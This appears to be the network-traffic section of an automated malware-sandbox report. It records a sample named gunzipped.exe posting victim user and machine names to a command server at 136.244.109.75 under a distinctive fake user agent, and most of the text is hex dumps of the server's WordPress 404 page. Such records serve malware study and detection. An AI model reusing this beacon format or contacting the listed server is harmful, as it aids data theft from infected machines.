6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:49.947850943 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:49.947889090 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:49.947926998 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:49.947971106 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:49.948009968 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:49.948054075 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:49.948092937 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:49.948159933 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:49.948204041 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.549751136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:50.302448988 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:50.510911942 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:51.438206911 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:50 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:51.438271999 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:51.438308001 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:51.438344955 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:51.438384056 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:51.438422918 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:51.438462019 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:51.438499928 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:51.438540936 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:51.438585043 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          39192.168.2.549752136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:51.797146082 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:52.005431890 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:53.016751051 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:51 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
